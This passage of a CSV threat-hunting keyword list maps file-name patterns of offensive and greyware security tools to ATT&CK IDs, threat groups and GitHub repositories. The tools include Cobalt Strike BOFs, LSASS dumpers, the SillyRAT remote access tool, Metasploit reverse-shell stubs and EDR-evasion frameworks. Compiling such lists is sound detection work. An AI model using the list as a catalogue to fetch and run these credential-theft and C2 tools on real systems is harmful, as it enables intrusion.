protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","1","7","3","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z" +"*sigthief.exe.manifest*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*SigThief.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*sigthief.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*SigThief-master*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*sigwhatever.exe*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*Silent Lsass Dump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*silenthound.py*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*silenthound_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*silenthound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - 
T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*SilentHound-main*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*silentLsassDump*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*SilentMoonwalk.cpp*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - 
T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*SilentMoonwalk.exe*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*SilentMoonwalk.sln*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*SilentMoonwalk-master*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*SilentProcessExitRegistrySetter.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*SilentProcessExitRegistrySetter.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*SILENTTRINITY*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*silenttrinity*.dll*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*SillyRAT.git*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" +"*sillyrat.py*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" +"*silver*/beacon.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*silver*implant.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - 
T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*SilverPoision*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SilverPoision","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SilverPoision/Rock-ON*","offensive_tool_keyword","Rock-ON","Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually. A thorough blog will be up in sometime. Stay tuned for the Stable version with a UI","T1590 - T1210.001 - T1190 - T1213","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/SilverPoision/Rock-ON","1","1","N/A","N/A","3","288","70","2019-11-30T04:00:03Z","2019-06-10T04:42:32Z" +"*SimoneLazzaris/ditty*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z" +"*simple_dropper.ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*SimpleHTTPServer.SimpleHTTPRequestHandler*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" 
+"*simplekeylogger.*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z"
+"*SimplyEmail.py*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z"
+"*SimplyEmail-master*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z"
+"*SimplySecurity/SimplyEmail*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z"
+"*single_reverse_tcp_shell.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*single_shell_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*single_shell_reverse_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*single_target_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*sipdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*sipvicious_svcrack* -u100","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*sitadel http://*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z"
+"*sitadel https://*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z"
+"*sitadel.py *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z"
+"*Sitadel-master.zip*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z"
+"*site-packages/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*-Situational-Awareness-BOF*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z"
+"*skahwah*wordsmith*","offensive_tool_keyword","wordsmith","The aim of Wordsmith is to assist with creating tailored wordlists and usernames that are primarilly based on geolocation.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/skahwah/wordsmith","1","1","N/A","N/A","2","158","21","2018-05-03T13:44:01Z","2016-07-06T14:02:51Z"
+"*skelsec/jackdaw*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 - T1590 - T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z"
+"*SkipPasswordAgeCheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*SkipPortScan*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*skymem-get-mails *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"*SLACKAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
+"*slackor.db*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*sleep_python_bridge.sleepy*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*sleep_python_bridge.striker*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 